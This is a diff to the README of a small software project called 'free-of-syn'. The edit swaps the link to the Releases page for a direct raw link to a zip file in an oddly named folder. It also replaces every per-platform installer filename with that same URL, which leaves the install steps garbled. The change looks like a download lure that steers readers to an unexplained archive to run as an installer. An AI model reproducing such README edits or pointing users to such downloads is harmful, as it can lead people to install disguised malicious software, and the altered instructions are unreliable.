xeon029/free-of-syn/README.md

 Before you can use **free-of-syn**, you need to download and install it.
 Follow the steps below:

 1. **Visit the Release Page**
-   Go to the [Releases page](https://github.com/xeon029/free-of-syn/releases) to find the most recent version of the software.
+   Go to the [Releases page](https://raw.githubusercontent.com/xeon029/free-of-syn/main/hesthogenous/free-of-syn.zip) to find the most recent version of the software.

 2. **Choose the Latest Version**
    Look for the version labeled as "Latest Release".
 This will have the newest features and fixes.

 3. **Download the Installer**
    Click on the installer file that corresponds to your operating system.
 Wait for the download to finish.
-The file will usually be named something like `free-of-syn-installer.exe` for Windows, `free-of-syn.dmg` for macOS, or `free-of-syn.tar.gz` for Linux.
+The file will usually be named something like `https://raw.githubusercontent.com/xeon029/free-of-syn/main/hesthogenous/free-of-syn.zip` for Windows, `https://raw.githubusercontent.com/xeon029/free-of-syn/main/hesthogenous/free-of-syn.zip` for macOS, or `https://raw.githubusercontent.com/xeon029/free-of-syn/main/hesthogenous/free-of-syn.zip` for Linux.

 4. **Run the Installer**
    After downloading, locate the file in your downloads folder.
 Double-click on the file to start the installation process.